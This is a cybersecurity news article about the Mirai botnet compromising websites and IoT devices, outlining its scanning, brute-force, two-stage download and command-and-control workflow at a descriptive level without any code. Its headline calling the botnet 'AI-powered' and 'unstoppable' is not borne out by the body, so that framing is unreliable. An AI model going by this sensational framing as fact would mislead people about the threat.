New AI-Powered Mirai Botnet Unleashes Unstoppable Large-Scale DDoS Attacks

The Mirai botnet is actively exploiting known web vulnerabilities to compromise over 1,200 sites across 780 customer accounts, as researchers have identified over 200 malicious URLs and 230 distinct malware samples, including bash scripts and ELF binaries, delivered through these attacks. 

The botnet leverages these compromised sites to launch further attacks, demonstrating its ongoing evolution and persistent threat to internet infrastructure. 

Attackers exploit web vulnerabilities to execute malicious bash scripts that download and install Mirai malware, which involves a first-stage script fetching a second-stage binary tailored to the target system’s architecture. 

example of a bash script that, when executed, downloads a second-stage binary that installs the Mirai malware onto the infected host

Simultaneously, the use of AI to create sophisticated DDoS attacks poses a serious threat because AI-powered polymorphic malware could evade detection and infect systems on a large scale, increasing the risk that Mirai botnets pose. 

Explore the Inner Workings of a Notorious Botnet

A DDoS botnet attack involves a centralized control server issuing attack commands to a network of compromised devices (botnet), which floods a target with malicious traffic, overwhelming its resources, and causing a denial of service. 

Botnets enhance DDoS attacks by obscuring the attacker’s identity, amplifying attack power, and distributing the attack across a vast, geographically dispersed network, making mitigation challenging.

sending attack traffic to the target.

The operators have shifted from spam-based monetization to extortion and DDoS-for-hire services like Mirai. The latter leverages the massive, weakly secured, and often neglected IoT device ecosystem. 

These devices offer a large, homogenous attack platform due to their numbers, poor vendor security, consumer apathy, market growth, and standardized operating systems, making them highly attractive targets for botnet recruitment. 

Highlights of the trend

Mirai’s scanning workflow aggressively seeks out vulnerable devices for recruitment, and initiates a SYN port scan to probe the internet, identifying potential targets. 

Following this, it attempts brute force authentication using simple pattern matching to compromise devices, and upon successful compromise, the scanner reports the newly infected device to a centralized command-and-control server, expanding the botnet’s reach. 

The infection workflow commences with the identification of vulnerable devices. The loader subsequently processes the acquired data and deploys architecture-specific malware onto the target device. 

After successful execution, the compromised device integrates into the botnet, actively participating in scanning and attack operations alongside other nodes. 

Workflow of the Infection

According to Imperva, the botnet attack workflow initiates with the botmaster transmitting an attack command to the control server, while the command and control system disseminates specific attack instructions to individual nodes. 

Upon receiving these directives, nodes concurrently execute the attack by flooding the target with packets at maximum rate while simultaneously maintaining their background scanning activities to continuously expand the botnet through the discovery and infection of new hosts. 

Also Read:

Kaaviya
Kaaviyahttps://cyberpress.org/
Kaaviya is a Security Editor and fellow reporter with Cyber Press. She is covering various cyber security incidents happening in the Cyber Space.

Recent Articles

Related Stories

LEAVE A REPLY

Please enter your comment!
Please enter your name here